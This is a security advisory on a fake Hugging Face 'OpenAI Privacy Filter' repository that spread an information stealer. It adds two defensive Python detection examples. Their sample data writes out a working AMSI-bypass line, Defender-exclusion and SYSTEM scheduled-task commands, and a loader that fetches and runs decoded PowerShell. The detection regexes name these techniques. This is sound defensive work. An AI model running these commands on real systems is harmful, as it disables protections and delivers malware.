Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads
A fake copy of OpenAI Privacy Filter on Hugging Face delivered an information stealer to 244,000 users in 18 hours
Typosquatted OpenAI Privacy Filter on Hugging Face Delivered Information Stealer to 244,000 Users in 18 Hours
TL;DR A malicious Hugging Face repository impersonating OpenAI's Privacy Filter reached the platform's #1 trending position with approximately 244,000 downloads in 18 hours before being disabled. The fake repository contained a loader that executed a multi-stage Windows information stealer. Infrastructure overlap with a separate npm package delivering ValleyRAT suggests coordinated supply chain attacks targeting open-source ecosystems.
What happened
In May 2026, security researchers at HiddenLayer identified a typosquatted repository on Hugging Face named Open-OSS/privacy-filter that mimicked OpenAI's legitimate Privacy Filter release. The malicious project copied the legitimate model's description verbatim to deceive users. OpenAI's Privacy Filter itself was unveiled in April 2026 as a tool to detect and redact personally identifiable information (PII) in unstructured text.
The fake repository achieved #1 trending status on Hugging Face with approximately 244,000 downloads and 667 likes within 18 hours. The download counts are suspected to have been artificially inflated to create an illusion of legitimacy.
The attack chain began when a user cloned the repository and executed either a bundled batch script or a Python loader. When the Python loader ran on Windows, it disabled TLS certificate verification, fetched a JSON document from JSON Keeper (a public JSON paste service), decoded a Base64-encoded URL from it, and extracted a PowerShell command that it then executed. That command downloaded a batch script from "api.eth-fastscan[.]org" and launched it via cmd.exe.
The batch script requested elevation through a UAC prompt, added Microsoft Defender Antivirus exclusions, downloaded a second-stage binary from the same domain, and created a scheduled task that ran a PowerShell script as SYSTEM. The task deleted itself once it had run: it was a one-shot SYSTEM-context launcher, not a persistence mechanism, so a post-incident sweep that looks only for persistence artefacts will not find it.
The final stage information stealer targeted sensitive data: screenshots, Discord credentials and data, cryptocurrency wallets and extensions, system metadata, FileZilla configurations, wallet seed phrases, and credentials stored in Chromium and Gecko browsers. The stealer attempted to disable Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) to evade behavioral detection. Exfiltrated data was sent in JSON format to "recargapopular[.]com."
Analysis uncovered six additional malicious repositories from user 'anthfu' using similar Python loaders: anthfu/Bonsai-8B-gguf, anthfu/Qwen3.6-35B-A3B-APEX-GGUF, anthfu/DeepSeek-V4-Pro, anthfu/Qwopus-GLM-18B-Merged-GGUF, anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF, and anthfu/supergemma4-26b-uncensored-gguf-v2.
Infrastructure overlap emerged with a separate campaign: the domain "api.eth-fastscan[.]org" was previously used to serve a Windows executable ("o0q2l47f.exe") that beaconed to "welovechinatown[.]info," a command-and-control server linked to a malicious npm package named 'trevlo'. Published on April 4, 2026, by user 'titaniumg', the trevlo package was downloaded more than 2,300 times and has since been removed from npm. Its postinstall hook executed an obfuscated JavaScript loader that spawned a base64-encoded PowerShell command, ultimately delivering ValleyRAT (also known as Winos 4.0). ValleyRAT is a tool associated almost exclusively with Silver Fox, a China-based threat group.
Why it matters
For developers and DevOps teams, this incident shows how exposed open-source distribution platforms are to typosquatting and supply chain compromise. The artificial inflation of download counts and trending position signals a coordinated effort to maximise exposure, and it means popularity metrics on such platforms cannot be treated as a trust signal. Packaging the loader as a legitimate-looking model repository exploits the trust developers place in well-known platforms rather than any vulnerability in the platform itself.
For SOC analysts and security teams, the attack chains combine several evasion techniques: TLS verification disabled in the loader, AMSI and ETW bypass attempts, UAC elevation, Defender exclusion configuration, and VM detection checks. Using a public paste service (JSON Keeper) as a dead-drop resolver lets the attackers swap payload URLs without touching the repository, so static review of the repository alone cannot tell you what it will run, and signatures written against one stage of the chain go stale as soon as the operator rotates it.
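As an added example for the SOC side (it is not code from HiddenLayer's report or from any tool it names), the Python below scores constructed Sysmon process-creation records and Microsoft Defender event 5007 records per host and per 15-minute window, so that stages that are individually benign (a developer spawning PowerShell from Python, an admin adding a Defender exclusion) only fire when several of them line up the way the chain above does. The rule set, weights, threshold, window and every event record are assumptions made for illustration.

```python
"""Added example (not from HiddenLayer's report or any tool it names):
score the host telemetry the chain above leaves behind, per host and per
short time window, so stages that are benign alone only fire together.
Record shapes follow Sysmon process creation (event 1) and Microsoft
Defender Antivirus/Operational event 5007 (configuration changed); rules,
weights, the window and every event below are constructed for illustration.
"""
from datetime import datetime, timedelta
import re

def _low(ev, key):
    return ev.get(key, "").lower()  # lower-cased string field, empty if absent

# Hypothetical rules: (label, weight, predicate over one event).
RULES = [
    ("python_spawns_powershell", 3,
     lambda ev: _low(ev, "ParentImage").endswith(("python.exe", "pythonw.exe"))
     and _low(ev, "Image").endswith(("powershell.exe", "pwsh.exe"))),
    ("encoded_powershell", 2,
     lambda ev: _low(ev, "Image").endswith(("powershell.exe", "pwsh.exe"))
     and re.search(r"\s-(e|ec|enc|encodedcommand)\s", _low(ev, "CommandLine"))),
    ("defender_exclusion", 3,
     lambda ev: (ev.get("EventID") == 5007 and "\\exclusions\\" in _low(ev, "Message"))
     or re.search(r"(add|set)-mppreference", _low(ev, "CommandLine"))),
    ("system_task_created", 3,
     lambda ev: _low(ev, "Image").endswith("schtasks.exe")
     and re.search(r"/create\b.*/ru\s+\"?(nt authority\\)?system\b", _low(ev, "CommandLine"))),
    ("task_deleted", 1,
     lambda ev: _low(ev, "Image").endswith("schtasks.exe") and "/delete" in _low(ev, "CommandLine")),
    ("amsi_etw_tamper", 3,
     lambda ev: re.search(r"amsiinitfailed|amsiscanbuffer|etweventwrite", _low(ev, "CommandLine"))),
]
WEIGHTS = {label: w for label, w, _ in RULES}

def classify(ev):
    """Labels of every rule one event trips, in RULES order."""
    return [label for label, _, pred in RULES if bool(pred(ev))]

def correlate(events, window=timedelta(minutes=15), threshold=8):
    """Best-window score per host. Distinct labels count once, so repeating
    one stage (many exclusion events, say) cannot push a host over the line."""
    hits = {}
    for ev in events:
        labels = classify(ev)
        if labels:
            ts = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")
            hits.setdefault(ev["Computer"], []).append((ts, labels))
    findings = []
    for host, host_hits in hits.items():
        host_hits.sort(key=lambda h: h[0])
        best = {"host": host, "score": 0, "labels": []}
        for i, (start, _) in enumerate(host_hits):
            seen, last = set(), start
            for ts, labels in host_hits[i:]:  # every hit within `window` of this start
                if ts - start > window:
                    break
                seen.update(labels)
                last = ts
            score = sum(WEIGHTS[l] for l in seen)
            if score > best["score"]:
                best = {"host": host, "score": score, "labels": sorted(seen),
                        "first": start, "last": last}
        if best["score"] >= threshold:
            findings.append(best)
    return sorted(findings, key=lambda f: -f["score"])

def proc(t, host, image, parent, cmd):
    return {"EventID": 1, "UtcTime": t, "Computer": host, "Image": image,
            "ParentImage": parent, "CommandLine": cmd}

def defender_5007(t, host, path):
    msg = ("Microsoft Defender Antivirus Configuration has changed. New value: "
           f"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\{path} = 0x0")
    return {"EventID": 5007, "UtcTime": t, "Computer": host, "Message": msg}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CMD, SCHT = "C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\schtasks.exe"
PY = "C:\\Users\\dev\\AppData\\Local\\Programs\\Python\\Python312\\python.exe"
TMP = "C:\\Users\\dev\\AppData\\Local\\Temp"

# Constructed sample telemetry: WS-DEV-07 runs the chain end to end in two
# minutes; WS-DEV-12 shows unrelated admin and developer activity hours apart.
SAMPLE_EVENTS = [
    proc("2026-05-12 09:14:03", "WS-DEV-07", PS, PY, "powershell -NoProfile -ep Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    proc("2026-05-12 09:14:05", "WS-DEV-07", CMD, PS, f"cmd.exe /c {TMP}\\r.bat"),
    proc("2026-05-12 09:14:09", "WS-DEV-07", PS, CMD, f'powershell -Command "Add-MpPreference -ExclusionPath {TMP}"'),
    defender_5007("2026-05-12 09:14:10", "WS-DEV-07", TMP),
    proc("2026-05-12 09:14:20", "WS-DEV-07", SCHT, CMD, f'schtasks /create /tn "Updater" /tr "powershell -ep bypass -File {TMP}\\u.ps1" /sc once /st 09:15 /ru SYSTEM /f'),
    proc("2026-05-12 09:15:03", "WS-DEV-07", PS, "C:\\Windows\\System32\\svchost.exe", "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"),
    proc("2026-05-12 09:15:06", "WS-DEV-07", SCHT, PS, 'schtasks /delete /tn "Updater" /f'),
    proc("2026-05-12 10:02:11", "WS-DEV-12", PS, "C:\\Windows\\explorer.exe", 'powershell -Command "Add-MpPreference -ExclusionPath D:\\builds"'),
    defender_5007("2026-05-12 10:02:12", "WS-DEV-12", "D:\\builds"),
    proc("2026-05-12 11:40:00", "WS-DEV-12", PS, PY, "powershell -NoProfile -Command Get-Date"),
]
```

Run against the sample, WS-DEV-07 scores 15 (all six stages inside 63 seconds) and WS-DEV-12 never exceeds 3, because its exclusion change and its Python-spawned PowerShell are 98 minutes apart. Counting each label once per window is the deliberate design choice: a host that adds fifty exclusions still scores once for that stage, while the self-deleting SYSTEM task is cheap to miss alone but adds up with the rest.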
The infrastructure overlap between the Hugging Face and npm campaigns indicates a broader supply chain operation targeting open-source ecosystems. This suggests threat actors are systematically abusing multiple distribution channels and may have identified open-source platforms as efficient initial access vectors.
Affected systems and CVEs
- Hugging Face (repository hosting platform)
- npm (Node.js package registry)
- Windows systems (primary attack surface for information stealer)
- Linux and macOS systems (secondary attack surface via Python loader)
- Applications whose stored data the stealer targeted (Discord, Chromium-based and Gecko-based browsers, FileZilla, cryptocurrency wallets and wallet browser extensions)
No CVE assigned at the time of publication.
What to do
- Verify that any OpenAI Privacy Filter repository you use is published under OpenAI's official Hugging Face organisation, as linked from OpenAI's own announcement, rather than a look-alike such as Open-OSS, before downloading it or using it in production environments.
- Review repository sources and publisher identity before cloning or installing dependencies from open-source platforms.
- Monitor systems for execution of suspicious batch scripts or Python loaders from untrusted sources, particularly those downloading and executing remote scripts via PowerShell.
- Implement application whitelisting policies to prevent unauthorised script execution.
- Audit npm package dependencies for preinstall, install and postinstall hooks; where they are not operationally necessary, install with npm install --ignore-scripts or set ignore-scripts=true in .npmrc, and review any hook before enabling it.
- If systems downloaded the malicious Hugging Face repository or trevlo npm package, assume compromise and conduct forensic analysis for indicators of the information stealer (screenshots exfiltration, browser credential theft, Discord session tokens).
- Review Microsoft Defender Antivirus logs for exclusion changes (Microsoft-Windows-Windows Defender/Operational event ID 5007 records configuration changes, including new exclusion paths), compare Get-MpPreference output against the exclusions you actually approved, and look for short-lived scheduled tasks (Security event ID 4698 where task auditing is enabled, or Microsoft-Windows-TaskScheduler/Operational event ID 106) and for AMSI or ETW tampering attempts.
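As an added example (not the page's, HiddenLayer's or Hugging Face's own tooling), the Python below does the pre-execution triage the second, third and fifth items above ask for: it walks a freshly cloned model repository or unpacked npm package and scores each script against the loader traits described in this report (TLS verification disabled, a Base64-decoded value handed to a spawned PowerShell, encoded commands, Defender exclusions, scheduled tasks, paste-site dead drops), and flags package.json install hooks on their own because they run with no user action. The indicator list, weights, threshold and the sample files it writes to a temp directory are assumptions for illustration; the sample scripts are written as text only and are never executed.

```python
"""Added example: static pre-execution triage of a cloned repo or unpacked
npm package. Indicators, weights and threshold are illustrative, not a
complete signature set; scripts are read as text and never executed."""
import json
import os
import re
import tempfile

# Hypothetical indicator set: (label, regex, weight).
INDICATORS = [
    ("tls_verify_disabled", r"_create_unverified_context|verify\s*=\s*False|check_hostname\s*=\s*False", 2),
    ("base64_decode", r"b64decode|FromBase64String|certutil\s+-decode", 1),
    ("spawns_powershell", r"powershell(\.exe)?|\bpwsh\b", 2),
    ("encoded_command", r"-(enc|encodedcommand)\b", 2),
    ("defender_exclusion", r"(Add|Set)-MpPreference", 3),
    ("scheduled_task", r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", 3),
    ("remote_fetch", r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|urlopen\(|requests\.get", 1),
    ("paste_dead_drop", r"jsonkeeper\.com|pastebin\.com", 2),
]
COMPILED = [(label, re.compile(rx, re.I), w) for label, rx, w in INDICATORS]
SCRIPT_EXTS = {".py", ".bat", ".cmd", ".ps1", ".sh", ".js"}
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
HOOK_WEIGHT = 5  # an install hook is reportable by itself


def score_text(text):
    """(labels, score) for one blob of script text."""
    hits = [(label, w) for label, rx, w in COMPILED if rx.search(text)]
    return [label for label, _ in hits], sum(w for _, w in hits)


def triage_package_json(text):
    """Flag each install hook, then score the hook command like any script."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (ValueError, AttributeError):
        return [], 0
    labels, score = [], 0
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            hook_labels, hook_score = score_text(str(scripts[hook]))
            labels += [f"install_hook:{hook}"] + hook_labels
            score += HOOK_WEIGHT + hook_score
    return labels, score


def triage_tree(root, threshold=5):
    """Findings (relative path, score, labels) at or above threshold, highest first."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == "package.json":
                labels, score = triage_package_json(text)
            elif os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                labels, score = score_text(text)
            else:
                continue  # model cards, weights, configs: not scored here
            if score >= threshold:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append({"path": rel, "score": score, "labels": labels})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed sample tree mimicking the shapes described in the report.
SAMPLE_FILES = {
    "README.md": "# privacy-filter\nDetects and redacts PII in unstructured text.\n",
    "infer.py": "import requests\nr = requests.get('https://example.invalid/weights.bin')\n",
    "loader.py": (
        "import base64, ssl, subprocess, urllib.request\n"
        "ssl._create_default_https_context = ssl._create_unverified_context\n"
        "cfg = urllib.request.urlopen('https://jsonkeeper.com/b/XXXX').read()\n"
        "cmd = base64.b64decode(cfg).decode()\n"
        "subprocess.Popen(['powershell', '-NoProfile', '-EncodedCommand', cmd])\n"
    ),
    "run.bat": (
        "@echo off\n"
        'powershell -Command "Add-MpPreference -ExclusionPath %TEMP%"\n'
        'schtasks /create /tn Updater /ru SYSTEM /tr "powershell -File %TEMP%\\s.ps1"\n'
    ),
    "package.json": json.dumps({"name": "sample-pkg", "scripts": {"postinstall": "node setup.js"}}),
}


def build_sample_tree():
    """Write the constructed files into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="triage-sample-")
    for name, text in SAMPLE_FILES.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    for f in triage_tree(build_sample_tree()):
        print(f"{f['score']:>2}  {f['path']:<13} {', '.join(f['labels'])}")
```

On the sample tree, loader.py scores 10 (six indicators), run.bat 8 and package.json 5, while infer.py, whose only hit is an ordinary HTTPS download, stays below the threshold. The threshold is set so that no single loader trait except an install hook is enough on its own; it is the combination of disabled certificate checks, a decoded blob and a spawned shell in one file that is unusual for a model repository.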
Open questions
- Whether download counts for both the Hugging Face repository and the trevlo npm package were artificially boosted using automation.
- The full identity and operational scope of the actors behind the malicious Hugging Face and npm repositories.
- Whether all six identified malicious repositories under 'anthfu' were deployed by the same threat actor.
- The total number of users whose systems may have executed the information stealer payload.
- Whether the malware successfully exfiltrated credentials from the full 244,000 downloads or whether many downloads did not result in payload execution.
Source
Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads


